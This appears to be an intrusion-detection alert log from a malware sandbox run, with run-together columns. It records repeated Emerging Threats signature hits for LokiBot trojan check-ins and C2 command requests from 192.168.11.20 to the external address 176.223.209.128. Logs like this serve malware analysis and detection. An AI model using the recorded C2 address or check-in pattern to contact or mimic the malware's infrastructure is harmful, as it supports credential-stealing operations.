                                              11/25/21-10:49:20.695066TCP2025381ET TROJAN LokiBot Checkin4997880192.168.11.20176.223.209.128
                                              11/25/21-10:49:20.695066TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997880192.168.11.20176.223.209.128
                                              11/25/21-10:49:21.204317TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997980192.168.11.20176.223.209.128
                                              11/25/21-10:49:21.204317TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997980192.168.11.20176.223.209.128
                                              11/25/21-10:49:21.204317TCP2025381ET TROJAN LokiBot Checkin4997980192.168.11.20176.223.209.128
                                              11/25/21-10:49:21.204317TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997980192.168.11.20176.223.209.128
                                              11/25/21-10:49:21.725257TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998080192.168.11.20176.223.209.128
                                              11/25/21-10:49:21.725257TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998080192.168.11.20176.223.209.128
                                              11/25/21-10:49:21.725257TCP2025381ET TROJAN LokiBot Checkin4998080192.168.11.20176.223.209.128
                                              11/25/21-10:49:21.725257TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998080192.168.11.20176.223.209.128
                                              11/25/21-10:49:22.161051TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998180192.168.11.20176.223.209.128
                                              11/25/21-10:49:22.161051TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998180192.168.11.20176.223.209.128
                                              11/25/21-10:49:22.161051TCP2025381ET TROJAN LokiBot Checkin4998180192.168.11.20176.223.209.128
                                              11/25/21-10:49:22.161051TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998180192.168.11.20176.223.209.128
                                              11/25/21-10:49:22.694084TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998280192.168.11.20176.223.209.128
                                              11/25/21-10:49:22.694084TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998280192.168.11.20176.223.209.128
                                              11/25/21-10:49:22.694084TCP2025381ET TROJAN LokiBot Checkin4998280192.168.11.20176.223.209.128
                                              11/25/21-10:49:22.694084TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998280192.168.11.20176.223.209.128
                                              11/25/21-10:49:23.236990TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998380192.168.11.20176.223.209.128
                                              11/25/21-10:49:23.236990TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998380192.168.11.20176.223.209.128
                                              11/25/21-10:49:23.236990TCP2025381ET TROJAN LokiBot Checkin4998380192.168.11.20176.223.209.128
                                              11/25/21-10:49:23.236990TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998380192.168.11.20176.223.209.128
                                              11/25/21-10:49:23.750984TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998480192.168.11.20176.223.209.128
                                              11/25/21-10:49:23.750984TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998480192.168.11.20176.223.209.128
                                              11/25/21-10:49:23.750984TCP2025381ET TROJAN LokiBot Checkin4998480192.168.11.20176.223.209.128
                                              11/25/21-10:49:23.750984TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998480192.168.11.20176.223.209.128
                                              11/25/21-10:49:24.261506TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998580192.168.11.20176.223.209.128
                                              11/25/21-10:49:24.261506TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998580192.168.11.20176.223.209.128
                                              11/25/21-10:49:24.261506TCP2025381ET TROJAN LokiBot Checkin4998580192.168.11.20176.223.209.128
                                              11/25/21-10:49:24.261506TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998580192.168.11.20176.223.209.128
                                              11/25/21-10:49:24.765311TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998680192.168.11.20176.223.209.128
                                              11/25/21-10:49:24.765311TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998680192.168.11.20176.223.209.128
                                              11/25/21-10:49:24.765311TCP2025381ET TROJAN LokiBot Checkin4998680192.168.11.20176.223.209.128
                                              11/25/21-10:49:24.765311TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998680192.168.11.20176.223.209.128
                                              11/25/21-10:49:25.270321TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998780192.168.11.20176.223.209.128
                                              11/25/21-10:49:25.270321TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998780192.168.11.20176.223.209.128
                                              11/25/21-10:49:25.270321TCP2025381ET TROJAN LokiBot Checkin4998780192.168.11.20176.223.209.128
                                              11/25/21-10:49:25.270321TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998780192.168.11.20176.223.209.128
                                              11/25/21-10:49:25.783039TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998880192.168.11.20176.223.209.128
                                              11/25/21-10:49:25.783039TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998880192.168.11.20176.223.209.128
                                              11/25/21-10:49:25.783039TCP2025381ET TROJAN LokiBot Checkin4998880192.168.11.20176.223.209.128
                                              11/25/21-10:49:25.783039TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998880192.168.11.20176.223.209.128
                                              11/25/21-10:49:26.316918TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998980192.168.11.20176.223.209.128
                                              11/25/21-10:49:26.316918TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998980192.168.11.20176.223.209.128
                                              11/25/21-10:49:26.316918TCP2025381ET TROJAN LokiBot Checkin4998980192.168.11.20176.223.209.128
                                              11/25/21-10:49:26.316918TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998980192.168.11.20176.223.209.128
                                              11/25/21-10:49:26.841395TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999080192.168.11.20176.223.209.128
                                              11/25/21-10:49:26.841395TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999080192.168.11.20176.223.209.128
                                              11/25/21-10:49:26.841395TCP2025381ET TROJAN LokiBot Checkin4999080192.168.11.20176.223.209.128
                                              11/25/21-10:49:26.841395TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999080192.168.11.20176.223.209.128
                                              11/25/21-10:49:27.357926TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999180192.168.11.20176.223.209.128
                                              11/25/21-10:49:27.357926TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999180192.168.11.20176.223.209.128
                                              11/25/21-10:49:27.357926TCP2025381ET TROJAN LokiBot Checkin4999180192.168.11.20176.223.209.128
                                              11/25/21-10:49:27.357926TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999180192.168.11.20176.223.209.128
                                              11/25/21-10:49:27.861743TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999280192.168.11.20176.223.209.128
                                              11/25/21-10:49:27.861743TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999280192.168.11.20176.223.209.128
                                              11/25/21-10:49:27.861743TCP2025381ET TROJAN LokiBot Checkin4999280192.168.11.20176.223.209.128
                                              11/25/21-10:49:27.861743TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999280192.168.11.20176.223.209.128
                                              11/25/21-10:49:28.402901TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999380192.168.11.20176.223.209.128
                                              11/25/21-10:49:28.402901TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999380192.168.11.20176.223.209.128
                                              11/25/21-10:49:28.402901TCP2025381ET TROJAN LokiBot Checkin4999380192.168.11.20176.223.209.128
                                              11/25/21-10:49:28.402901TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999380192.168.11.20176.223.209.128
                                              11/25/21-10:49:28.926178TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999480192.168.11.20176.223.209.128
                                              11/25/21-10:49:28.926178TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999480192.168.11.20176.223.209.128
                                              11/25/21-10:49:28.926178TCP2025381ET TROJAN LokiBot Checkin4999480192.168.11.20176.223.209.128
                                              11/25/21-10:49:28.926178TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999480192.168.11.20176.223.209.128
                                              11/25/21-10:49:29.395169TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999580192.168.11.20176.223.209.128
                                              11/25/21-10:49:29.395169TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999580192.168.11.20176.223.209.128
                                              11/25/21-10:49:29.395169TCP2025381ET TROJAN LokiBot Checkin4999580192.168.11.20176.223.209.128
                                              11/25/21-10:49:29.395169TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999580192.168.11.20176.223.209.128
                                              11/25/21-10:49:29.871513TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999680192.168.11.20176.223.209.128
                                              11/25/21-10:49:29.871513TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999680192.168.11.20176.223.209.128
                                              11/25/21-10:49:29.871513TCP2025381ET TROJAN LokiBot Checkin4999680192.168.11.20176.223.209.128
                                              11/25/21-10:49:29.871513TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999680192.168.11.20176.223.209.128
                                              11/25/21-10:49:30.393507TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999780192.168.11.20176.223.209.128
                                              11/25/21-10:49:30.393507TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999780192.168.11.20176.223.209.128
                                              11/25/21-10:49:30.393507TCP2025381ET TROJAN LokiBot Checkin4999780192.168.11.20176.223.209.128
                                              11/25/21-10:49:30.393507TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999780192.168.11.20176.223.209.128
                                              11/25/21-10:49:30.922836TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999880192.168.11.20176.223.209.128
                                              11/25/21-10:49:30.922836TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999880192.168.11.20176.223.209.128
                                              11/25/21-10:49:30.922836TCP2025381ET TROJAN LokiBot Checkin4999880192.168.11.20176.223.209.128
                                              11/25/21-10:49:30.922836TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999880192.168.11.20176.223.209.128
                                              11/25/21-10:49:31.432081TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999980192.168.11.20176.223.209.128
                                              11/25/21-10:49:31.432081TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999980192.168.11.20176.223.209.128
                                              11/25/21-10:49:31.432081TCP2025381ET TROJAN LokiBot Checkin4999980192.168.11.20176.223.209.128
                                              11/25/21-10:49:31.432081TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999980192.168.11.20176.223.209.128
                                              11/25/21-10:49:31.950901TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000080192.168.11.20176.223.209.128
                                              11/25/21-10:49:31.950901TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000080192.168.11.20176.223.209.128
                                              11/25/21-10:49:31.950901TCP2025381ET TROJAN LokiBot Checkin5000080192.168.11.20176.223.209.128
                                              11/25/21-10:49:31.950901TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000080192.168.11.20176.223.209.128
                                              11/25/21-10:49:32.411503TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000180192.168.11.20176.223.209.128
                                              11/25/21-10:49:32.411503TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000180192.168.11.20176.223.209.128
                                              11/25/21-10:49:32.411503TCP2025381ET TROJAN LokiBot Checkin5000180192.168.11.20176.223.209.128
                                              11/25/21-10:49:32.411503TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000180192.168.11.20176.223.209.128
                                              11/25/21-10:49:32.838212TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000280192.168.11.20176.223.209.128
                                              11/25/21-10:49:32.838212TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000280192.168.11.20176.223.209.128
                                              11/25/21-10:49:32.838212TCP2025381ET TROJAN LokiBot Checkin5000280192.168.11.20176.223.209.128
                                              11/25/21-10:49:32.838212TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000280192.168.11.20176.223.209.128
                                              11/25/21-10:49:33.371009TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000380192.168.11.20176.223.209.128
                                              11/25/21-10:49:33.371009TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000380192.168.11.20176.223.209.128
                                              11/25/21-10:49:33.371009TCP2025381ET TROJAN LokiBot Checkin5000380192.168.11.20176.223.209.128
                                              11/25/21-10:49:33.371009TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000380192.168.11.20176.223.209.128
                                              11/25/21-10:49:33.891069TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000480192.168.11.20176.223.209.128
                                              11/25/21-10:49:33.891069TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000480192.168.11.20176.223.209.128
                                              11/25/21-10:49:33.891069TCP2025381ET TROJAN LokiBot Checkin5000480192.168.11.20176.223.209.128
                                              11/25/21-10:49:33.891069TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000480192.168.11.20176.223.209.128
                                              11/25/21-10:49:34.420369TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000580192.168.11.20176.223.209.128
                                              11/25/21-10:49:34.420369TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000580192.168.11.20176.223.209.128
                                              11/25/21-10:49:34.420369TCP2025381ET TROJAN LokiBot Checkin5000580192.168.11.20176.223.209.128
                                              11/25/21-10:49:34.420369TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000580192.168.11.20176.223.209.128
                                              11/25/21-10:49:34.921609TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000680192.168.11.20176.223.209.128
                                              11/25/21-10:49:34.921609TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000680192.168.11.20176.223.209.128
                                              11/25/21-10:49:34.921609TCP2025381ET TROJAN LokiBot Checkin5000680192.168.11.20176.223.209.128
                                              11/25/21-10:49:34.921609TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000680192.168.11.20176.223.209.128
                                              11/25/21-10:49:35.381645TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000780192.168.11.20176.223.209.128
                                              11/25/21-10:49:35.381645TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000780192.168.11.20176.223.209.128
                                              11/25/21-10:49:35.381645TCP2025381ET TROJAN LokiBot Checkin5000780192.168.11.20176.223.209.128
                                              11/25/21-10:49:35.381645TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000780192.168.11.20176.223.209.128
                                              11/25/21-10:49:35.899719TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000880192.168.11.20176.223.209.128
                                              11/25/21-10:49:35.899719TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000880192.168.11.20176.223.209.128
                                              11/25/21-10:49:35.899719TCP2025381ET TROJAN LokiBot Checkin5000880192.168.11.20176.223.209.128
                                              11/25/21-10:49:35.899719TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000880192.168.11.20176.223.209.128
                                              11/25/21-10:49:36.430850TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000980192.168.11.20176.223.209.128
                                              11/25/21-10:49:36.430850TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000980192.168.11.20176.223.209.128
                                              11/25/21-10:49:36.430850TCP2025381ET TROJAN LokiBot Checkin5000980192.168.11.20176.223.209.128
                                              11/25/21-10:49:36.430850TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000980192.168.11.20176.223.209.128
                                              11/25/21-10:49:36.941067TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001080192.168.11.20176.223.209.128
                                              11/25/21-10:49:36.941067TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001080192.168.11.20176.223.209.128
                                              11/25/21-10:49:36.941067TCP2025381ET TROJAN LokiBot Checkin5001080192.168.11.20176.223.209.128
                                              11/25/21-10:49:36.941067TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001080192.168.11.20176.223.209.128
                                              11/25/21-10:49:37.484066TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001180192.168.11.20176.223.209.128
                                              11/25/21-10:49:37.484066TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001180192.168.11.20176.223.209.128
                                              11/25/21-10:49:37.484066TCP2025381ET TROJAN LokiBot Checkin5001180192.168.11.20176.223.209.128
                                              11/25/21-10:49:37.484066TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001180192.168.11.20176.223.209.128
                                              11/25/21-10:49:37.955485TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001280192.168.11.20176.223.209.128
                                              11/25/21-10:49:37.955485TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001280192.168.11.20176.223.209.128
                                              11/25/21-10:49:37.955485TCP2025381ET TROJAN LokiBot Checkin5001280192.168.11.20176.223.209.128
                                              11/25/21-10:49:37.955485TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001280192.168.11.20176.223.209.128
                                              11/25/21-10:49:38.463778TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001380192.168.11.20176.223.209.128
                                              11/25/21-10:49:38.463778TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001380192.168.11.20176.223.209.128
                                              11/25/21-10:49:38.463778TCP2025381ET TROJAN LokiBot Checkin5001380192.168.11.20176.223.209.128
                                              11/25/21-10:49:38.463778TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001380192.168.11.20176.223.209.128
                                              11/25/21-10:49:38.976726TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001480192.168.11.20176.223.209.128
                                              11/25/21-10:49:38.976726TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001480192.168.11.20176.223.209.128
                                              11/25/21-10:49:38.976726TCP2025381ET TROJAN LokiBot Checkin5001480192.168.11.20176.223.209.128
                                              11/25/21-10:49:38.976726TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001480192.168.11.20176.223.209.128
                                              11/25/21-10:49:39.500286TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001580192.168.11.20176.223.209.128
                                              11/25/21-10:49:39.500286TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001580192.168.11.20176.223.209.128
                                              11/25/21-10:49:39.500286TCP2025381ET TROJAN LokiBot Checkin5001580192.168.11.20176.223.209.128
                                              11/25/21-10:49:39.500286TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001580192.168.11.20176.223.209.128
                                              11/25/21-10:49:40.035714TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001680192.168.11.20176.223.209.128
                                              11/25/21-10:49:40.035714TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001680192.168.11.20176.223.209.128
                                              11/25/21-10:49:40.035714TCP2025381ET TROJAN LokiBot Checkin5001680192.168.11.20176.223.209.128
                                              11/25/21-10:49:40.035714TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001680192.168.11.20176.223.209.128
                                              11/25/21-10:49:40.546893TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001780192.168.11.20176.223.209.128
                                              11/25/21-10:49:40.546893TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001780192.168.11.20176.223.209.128
                                              11/25/21-10:49:40.546893TCP2025381ET TROJAN LokiBot Checkin5001780192.168.11.20176.223.209.128
                                              11/25/21-10:49:40.546893TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001780192.168.11.20176.223.209.128
                                              11/25/21-10:49:41.083152TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001880192.168.11.20176.223.209.128
                                              11/25/21-10:49:41.083152TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001880192.168.11.20176.223.209.128
                                              11/25/21-10:49:41.083152TCP2025381ET TROJAN LokiBot Checkin5001880192.168.11.20176.223.209.128
                                              11/25/21-10:49:41.083152TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001880192.168.11.20176.223.209.128
                                              11/25/21-10:49:41.586027TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001980192.168.11.20176.223.209.128
                                              11/25/21-10:49:41.586027TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001980192.168.11.20176.223.209.128
                                              11/25/21-10:49:41.586027TCP2025381ET TROJAN LokiBot Checkin5001980192.168.11.20176.223.209.128
                                              11/25/21-10:49:41.586027TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001980192.168.11.20176.223.209.128
                                              11/25/21-10:49:42.108784TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002080192.168.11.20176.223.209.128
                                              11/25/21-10:49:42.108784TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002080192.168.11.20176.223.209.128
                                              11/25/21-10:49:42.108784TCP2025381ET TROJAN LokiBot Checkin5002080192.168.11.20176.223.209.128
                                              11/25/21-10:49:42.108784TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002080192.168.11.20176.223.209.128
                                              11/25/21-10:49:42.628958TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002180192.168.11.20176.223.209.128
                                              11/25/21-10:49:42.628958TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002180192.168.11.20176.223.209.128
                                              11/25/21-10:49:42.628958TCP2025381ET TROJAN LokiBot Checkin5002180192.168.11.20176.223.209.128
                                              11/25/21-10:49:42.628958TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002180192.168.11.20176.223.209.128
                                              11/25/21-10:49:43.093221TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002280192.168.11.20176.223.209.128
                                              11/25/21-10:49:43.093221TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002280192.168.11.20176.223.209.128
                                              11/25/21-10:49:43.093221TCP2025381ET TROJAN LokiBot Checkin5002280192.168.11.20176.223.209.128
                                              11/25/21-10:49:43.093221TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002280192.168.11.20176.223.209.128
                                              11/25/21-10:49:43.580124TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002380192.168.11.20176.223.209.128
                                              11/25/21-10:49:43.580124TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002380192.168.11.20176.223.209.128
                                              11/25/21-10:49:43.580124TCP2025381ET TROJAN LokiBot Checkin5002380192.168.11.20176.223.209.128
                                              11/25/21-10:49:43.580124TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002380192.168.11.20176.223.209.128
                                              11/25/21-10:49:44.062925TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002480192.168.11.20176.223.209.128
                                              11/25/21-10:49:44.062925TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002480192.168.11.20176.223.209.128
                                              11/25/21-10:49:44.062925TCP2025381ET TROJAN LokiBot Checkin5002480192.168.11.20176.223.209.128
                                              11/25/21-10:49:44.062925TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002480192.168.11.20176.223.209.128
                                              11/25/21-10:49:44.593789TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002580192.168.11.20176.223.209.128
                                              11/25/21-10:49:44.593789TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002580192.168.11.20176.223.209.128
                                              11/25/21-10:49:44.593789TCP2025381ET TROJAN LokiBot Checkin5002580192.168.11.20176.223.209.128
                                              11/25/21-10:49:44.593789TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002580192.168.11.20176.223.209.128
                                              11/25/21-10:49:45.081557TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002680192.168.11.20176.223.209.128
                                              11/25/21-10:49:45.081557TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002680192.168.11.20176.223.209.128
                                              11/25/21-10:49:45.081557TCP2025381ET TROJAN LokiBot Checkin5002680192.168.11.20176.223.209.128
                                              11/25/21-10:49:45.081557TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002680192.168.11.20176.223.209.128
                                              11/25/21-10:49:45.567535TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002780192.168.11.20176.223.209.128
                                              11/25/21-10:49:45.567535TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002780192.168.11.20176.223.209.128
                                              11/25/21-10:49:45.567535TCP2025381ET TROJAN LokiBot Checkin5002780192.168.11.20176.223.209.128
                                              11/25/21-10:49:45.567535TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002780192.168.11.20176.223.209.128
                                              11/25/21-10:49:46.099241TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002980192.168.11.20176.223.209.128
                                              11/25/21-10:49:46.099241TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002980192.168.11.20176.223.209.128
                                              11/25/21-10:49:46.099241TCP2025381ET TROJAN LokiBot Checkin5002980192.168.11.20176.223.209.128
                                              11/25/21-10:49:46.099241TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002980192.168.11.20176.223.209.128
                                              11/25/21-10:49:46.560009TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003080192.168.11.20176.223.209.128
                                              11/25/21-10:49:46.560009TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003080192.168.11.20176.223.209.128
                                              11/25/21-10:49:46.560009TCP2025381ET TROJAN LokiBot Checkin5003080192.168.11.20176.223.209.128
                                              11/25/21-10:49:46.560009TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003080192.168.11.20176.223.209.128
                                              11/25/21-10:49:47.093239TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003180192.168.11.20176.223.209.128
                                              11/25/21-10:49:47.093239TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003180192.168.11.20176.223.209.128
                                              11/25/21-10:49:47.093239TCP2025381ET TROJAN LokiBot Checkin5003180192.168.11.20176.223.209.128
                                              11/25/21-10:49:47.093239TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003180192.168.11.20176.223.209.128
                                              11/25/21-10:49:47.621286TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003280192.168.11.20176.223.209.128
                                              11/25/21-10:49:47.621286TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003280192.168.11.20176.223.209.128
                                              11/25/21-10:49:47.621286TCP2025381ET TROJAN LokiBot Checkin5003280192.168.11.20176.223.209.128
                                              11/25/21-10:49:47.621286TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003280192.168.11.20176.223.209.128
                                              11/25/21-10:49:48.138015TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003380192.168.11.20176.223.209.128
                                              11/25/21-10:49:48.138015TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003380192.168.11.20176.223.209.128
                                              11/25/21-10:49:48.138015TCP2025381ET TROJAN LokiBot Checkin5003380192.168.11.20176.223.209.128
                                              11/25/21-10:49:48.138015TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003380192.168.11.20176.223.209.128
                                              11/25/21-10:49:48.608440TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003480192.168.11.20176.223.209.128
                                              11/25/21-10:49:48.608440TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003480192.168.11.20176.223.209.128
                                              11/25/21-10:49:48.608440TCP2025381ET TROJAN LokiBot Checkin5003480192.168.11.20176.223.209.128
                                              11/25/21-10:49:48.608440TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003480192.168.11.20176.223.209.128
                                              11/25/21-10:49:49.101921TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003580192.168.11.20176.223.209.128
                                              11/25/21-10:49:49.101921TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003580192.168.11.20176.223.209.128
                                              11/25/21-10:49:49.101921TCP2025381ET TROJAN LokiBot Checkin5003580192.168.11.20176.223.209.128
                                              11/25/21-10:49:49.101921TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003580192.168.11.20176.223.209.128
                                              11/25/21-10:49:49.626649TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003680192.168.11.20176.223.209.128
                                              11/25/21-10:49:49.626649TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003680192.168.11.20176.223.209.128
                                              11/25/21-10:49:49.626649TCP2025381ET TROJAN LokiBot Checkin5003680192.168.11.20176.223.209.128
                                              11/25/21-10:49:49.626649TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003680192.168.11.20176.223.209.128
                                              11/25/21-10:49:50.135554TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003780192.168.11.20176.223.209.128
                                              11/25/21-10:49:50.135554TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003780192.168.11.20176.223.209.128
                                              11/25/21-10:49:50.135554TCP2025381ET TROJAN LokiBot Checkin5003780192.168.11.20176.223.209.128
